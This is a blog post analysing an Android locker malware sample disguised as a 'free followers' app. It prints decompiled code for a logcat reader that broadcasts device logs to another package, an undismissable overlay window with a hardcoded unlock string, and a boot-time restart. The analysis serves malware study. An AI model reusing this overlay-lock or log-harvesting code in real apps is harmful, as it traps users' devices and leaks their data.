DEV Community

Cover image for Malware - Free Followers
R Srikesh
R Srikesh

Posted on • Edited on

Malware - Free Followers

I found this malware sample from malwareBazaar.

SHA-256 Hash: 5251a356421340a45c8dc6d431ef8a8cbca4078a0305a87f4fbd552e9fc0793e

When we open the application we are greeted with a window that looks like

Malware Window

Note: We cant close this window

Lets dive into APK Analysis with inspecting Android Manifest.xml

There are 2 suspicious permissions to keep in mind

  1. android.permission.SYSTEM_ALERT_WINDOW

    This permission allows an app to create windows

  2. android.permission.WAKE_LOCK

    allows your app to keep the device awake, even when the device is in sleep mode

Lets dive into Main Activity

Two important things to notice is

ADRTLogCatReader.onContext(this, "com.aide.ui");
startService(new Intent(this, Class.forName("com.XPhantom.id.MyService")));
Enter fullscreen mode Exit fullscreen mode

If we look into ADRTLogCatReader, we could see a suspicious code

public void run() {
        try {
            BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec("logcat -v threadtime").getInputStream()), 20);
            while (true) {
                String readLine = bufferedReader.readLine();
                if (readLine == null) {
                    return;
                }
                ADRTSender.sendLogcatLines(new String[]{readLine});
            }
        } catch (IOException e) {
        }
    }
Enter fullscreen mode Exit fullscreen mode

We could a malicious command getting executed during Runtime. The command logcat -v threadtime can give details like date, invocation time, priority, tag, PID, and TID of the thread issuing the message.

Now another suspicious code is this line ADRTSender.sendLogcatLines(new String[]{readLine}); where the details from our logcat is passed as argument.

If we look into sendLogcatLines()

public static void sendLogcatLines(String[] strArr) {
        Intent intent = new Intent();
        intent.setPackage(debuggerPackageName);
        intent.setAction("com.adrt.LOGCAT_ENTRIES");
        intent.putExtra("lines", strArr);
        context.sendBroadcast(intent);
    }
Enter fullscreen mode Exit fullscreen mode

We could see that our logs is sent to an app whose package name was defined in MainActivity (ie com.aide.ui) using intents.

Now lets look for the reason why window is there (and why not closable).

Since no other code other than invoking the service was called, lets look into the service implementation and yes we get the reason.

public void onCreate() {
        ADRTLogCatReader.onContext(this, "com.aide.ui");
        this.windowManager = (WindowManager) getSystemService("window");
        this.myView = (ViewGroup) ((LayoutInflater) getSystemService("layout_inflater")).inflate(C0000R.layout.main, (ViewGroup) null);
        this.chatHead = new ImageView(this);
        this.chatHead.setImageResource(C0000R.drawable.ic_launcher);
        this.f0e1 = (EditText) this.myView.findViewById(C0000R.C0001id.mainEditText1);
        ((Button) this.myView.findViewById(C0000R.C0001id.mainButton1)).setOnClickListener(new View.OnClickListener(this) { // from class: com.XPhantom.id.MyService.100000000

            /* renamed from: this$0 */
            private final MyService thiss;

            {
                this.thiss = this;
            }

            @Override // android.view.View.OnClickListener
            public void onClick(View view) {
                if (this.thiss.f0e1.getText().toString().equals("Abdullah@")) {
                    this.thiss.windowManager.removeView(this.thiss.myView);
                    try {
                        this.thiss.context.startService(new Intent(this.thiss.context, Class.forName("com.XPhantom.id.MyService")));
                        return;
                    } catch (ClassNotFoundException e) {
                        throw new NoClassDefFoundError(e.getMessage());
                    }
                }
                this.thiss.f0e1.setText("");
            }
        });
        WindowManager.LayoutParams layoutParams = new WindowManager.LayoutParams(-2, -2, 2002, 1, -3);
        layoutParams.gravity = 17;
        layoutParams.x = 0;
        layoutParams.y = 0;
        new View(this).setBackgroundColor(872349696);
        this.windowManager.addView(this.myView, layoutParams);
    }
Enter fullscreen mode Exit fullscreen mode

We could understand that this window is programmed not to close for any input provided in the Editbox.

Another important thing to note is that this window open even if we didnt open the app and it opens when we turn on our phone after power-off and the reason for this is a BroadcastReceiver that calls the service for the intent android.intent.action.BOOT_COMPLETED .

Ending Note

This was a fun malware to look into and I would recommend those who are getting started in Android Reversing / Malware Analysis to started with this sample.

Top comments (1)

Collapse
 
priteshusadadiya profile image
Pritesh Usadadiya

[[..Pingback..]]
This article was curated as a part of #89th Issue of Software Testing Notes Newsletter.
Web: softwaretestingnotes.com